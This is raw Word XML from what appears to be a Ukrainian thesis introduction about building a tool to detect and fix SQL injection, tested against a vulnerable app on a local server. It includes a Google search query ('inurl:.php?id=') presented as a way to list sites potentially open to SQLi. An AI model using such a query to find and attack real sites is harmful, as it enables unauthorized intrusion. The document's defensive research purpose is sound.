                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>міжсайтовий скриптинг</w:t>
            </w:r>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00543E7D" w:rsidRPr="0061042F" w14:paraId="55B85F23" w14:textId="77777777" w:rsidTr="008945BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="943" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00D7EDA6" w14:textId="77777777" w:rsidR="00543E7D" w:rsidRDefault="00543E7D" w:rsidP="00543E7D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="-57"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
              <w:t>БД</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="583A166E" w14:textId="05D0C2C0" w:rsidR="00543E7D" w:rsidRPr="00543E7D" w:rsidRDefault="00543E7D" w:rsidP="008945BB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="-57"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
              <w:t>ОС</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E58D417" w14:textId="77777777" w:rsidR="00543E7D" w:rsidRDefault="00543E7D" w:rsidP="008945BB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:sym w:font="Symbol" w:char="F02D"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="751A2D59" w14:textId="77777777" w:rsidR="00543E7D" w:rsidRDefault="00543E7D" w:rsidP="00543E7D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:sym w:font="Symbol" w:char="F02D"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="477B6A34" w14:textId="34CBED3C" w:rsidR="00543E7D" w:rsidRPr="00543E7D" w:rsidRDefault="00543E7D" w:rsidP="00543E7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="731C7B34" w14:textId="77777777" w:rsidR="00543E7D" w:rsidRDefault="00543E7D" w:rsidP="00543E7D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-57" w:right="-57"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
              <w:t>База даних</w:t>
            </w:r>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64A62A79" w14:textId="32183774" w:rsidR="00543E7D" w:rsidRPr="00543E7D" w:rsidRDefault="00543E7D" w:rsidP="008945BB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-57" w:right="-57"/>
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:bCs/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:bCs/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Операційна система.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00543E7D" w:rsidRPr="0061042F" w14:paraId="2BE22B51" w14:textId="77777777" w:rsidTr="00543E7D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="943" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59602B5A" w14:textId="75B06025" w:rsidR="00543E7D" w:rsidRPr="00543E7D" w:rsidRDefault="00543E7D" w:rsidP="00543E7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="596BF4EF" w14:textId="26AF7C0B" w:rsidR="00543E7D" w:rsidRPr="00543E7D" w:rsidRDefault="00543E7D" w:rsidP="00543E7D">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DA05B7A" w14:textId="6DC58FBE" w:rsidR="00543E7D" w:rsidRPr="0061042F" w:rsidRDefault="00543E7D" w:rsidP="00543E7D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="-57"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3DB04E23" w14:textId="0AEE0D71" w:rsidR="003A7B15" w:rsidRDefault="003A7B15" w:rsidP="003A7B15">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1418"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="698662DE" w14:textId="638BCF0A" w:rsidR="00483689" w:rsidRDefault="00483689" w:rsidP="00483689">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05929E29" w14:textId="63643790" w:rsidR="00483689" w:rsidRDefault="00483689" w:rsidP="00483689">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2317"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B48B06" w14:textId="77777777" w:rsidR="00483689" w:rsidRDefault="00483689">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDD71D0" w14:textId="76801148" w:rsidR="00483689" w:rsidRDefault="002E3E8B" w:rsidP="00962467">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2317"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ВСТУП</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A23DF62" w14:textId="498A700D" w:rsidR="002E3E8B" w:rsidRPr="00962467" w:rsidRDefault="002E3E8B" w:rsidP="00962467">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2317"/>
        </w:tabs>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D775088" w14:textId="5CACFA50" w:rsidR="0023578F" w:rsidRDefault="0023578F" w:rsidP="0023578F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>На сьогоднішній день інтенсивність розвитку мережі інтернет неухильно зростає, проблема захисту веб-ресурсів від атак SQL-ін’єкціями (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">) є досить актуальною на сьогоднішній день. Роль сайтів та їх вплив на бізнес постійно зростає, а перенасичений ринок некваліфікованих веб-програмістів, часто роль яких виконують студенти, згубно впливає на якість програмних продуктів і сайтів зокрема. Проблема безпеки у таких виконавців, на жаль, стоїть далеко не на першому місці. Становище ускладняється і тим, що замовник деколи залишається в невіданні, що його сайт і всі розташовані там дані є слабко захищеними або незахищеними взагалі. Для демонстрації цього потрібно просто увести пошуковий запит у </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inurl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>=», який виведе нам список результатів, в яких передача параметрів на сайт відбувається відкрито через масив GET, тобто таких ресурсів, які є потенційно вразливими до атак, що мають назву SQLi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670CCEFD" w14:textId="1A2580BB" w:rsidR="0023578F" w:rsidRDefault="0023578F" w:rsidP="0023578F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Виникає питання чим загрожує SQLi? Щоб відповісти на це питання – достатньо в якості параметра передати на вразливий ресурс SQL запит. Знаючи SQL та розуміючи лог</w:t>
      </w:r>
      <w:r w:rsidR="00956AC7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>і</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ку її обробки в PHP зловмисник може досягнути будь-яких результатів – від простого розкриття паролів до видалення бази даних.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716DA5F6" w14:textId="77777777" w:rsidR="0023578F" w:rsidRDefault="0023578F" w:rsidP="0023578F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Таким чином, актуальність забезпечення захисту інформації від SQL-ін’єкцій пов’язана з широким використанням баз даних на сайтах та у веб-додатках, які можуть бути скомпрометованими кібер-злочинцями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513B8176" w14:textId="76196C88" w:rsidR="00956AC7" w:rsidRDefault="00956AC7" w:rsidP="00956AC7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2317"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00956AC7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Метою роботи є розробка інструменту, який допомагає виявити </w:t>
      </w:r>
      <w:r w:rsidRPr="00956AC7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00956AC7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-ін’єкції і містить в собі рекомендації по їх усуненню.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4865912C" w14:textId="0757455F" w:rsidR="00956AC7" w:rsidRDefault="00956AC7" w:rsidP="00956AC7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2317"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Для досягнення поставленої мети вирішуються такі задачі:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6085E4BC" w14:textId="60BE0921" w:rsidR="003E5E9B" w:rsidRDefault="003E5E9B" w:rsidP="003E5E9B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Дослідження методів, які допомагають виявити </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5E9B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ін’єкції;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757127AD" w14:textId="7C97BBDC" w:rsidR="003E5E9B" w:rsidRDefault="003E5E9B" w:rsidP="003E5E9B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Розробка інструменту для виявлення </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5E9B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ін’єкцій;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640ED7FD" w14:textId="70093B6C" w:rsidR="003E5E9B" w:rsidRDefault="003E5E9B" w:rsidP="003E5E9B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Знаходження та встановлення на локальному сервері вразливого до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5E9B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ін’єкцій веб-додатку;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D39A09C" w14:textId="296DBA6F" w:rsidR="003E5E9B" w:rsidRDefault="003E5E9B" w:rsidP="003E5E9B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Експлуатація вразливого веб-додатку розробленим методом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EE65C5" w14:textId="28FB3FCE" w:rsidR="003E5E9B" w:rsidRPr="003E5E9B" w:rsidRDefault="003E5E9B" w:rsidP="003E5E9B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E5E9B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Об’єктом дослідження є</w:t>
      </w:r>
      <w:r w:rsidR="007D796A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D796A" w:rsidRPr="003E5E9B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>виявлення SQL-ін’єкцій і їх усунення</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5E9B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Предметом дослідження є </w:t>
      </w:r>
      <w:r w:rsidR="007D796A" w:rsidRPr="003E5E9B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>вразливий веб-додаток</w:t>
      </w:r>
      <w:r w:rsidRPr="003E5E9B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6073F26B" w14:textId="60B645A9" w:rsidR="003E5E9B" w:rsidRDefault="003E5E9B" w:rsidP="003E5E9B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7371"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Розроблений метод та веб-додаток відносяться до галузі інформаційної безпеки і можуть бути використані для підвищення рівня захищеності серверів БД.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7195F030" w14:textId="080DBDBD" w:rsidR="003E5E9B" w:rsidRDefault="00D16E1B" w:rsidP="003E5E9B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Методи дослідження по даній темі проводились на основі методів виявлення та усунення </w:t>
      </w:r>
      <w:r w:rsidRPr="00D16E1B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ін’єкцій. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1234AEFD" w14:textId="537006C5" w:rsidR="00D16E1B" w:rsidRDefault="00D16E1B" w:rsidP="003E5E9B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Новизна одержаних результатів полягає в наступному:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364ABD55" w14:textId="68E99467" w:rsidR="00D16E1B" w:rsidRPr="00D16E1B" w:rsidRDefault="007D796A" w:rsidP="00D16E1B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D796A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Наукова новизна дослідження полягає в наступному: вперше розроблено веб-додаток, який містить у собі інструменти для ручного і автоматичного тестування веб-додатків, які є клієнтом сервера баз даних. Також розроблений інструмент містить в собі рекомендації, за рахунок яких розробники можуть ви-правити вразливість в коді.</w:t>
      </w:r>
      <w:r w:rsidR="00D16E1B" w:rsidRPr="00D16E1B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC0A7EF" w14:textId="48872D11" w:rsidR="00D16E1B" w:rsidRDefault="00D16E1B" w:rsidP="00D16E1B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
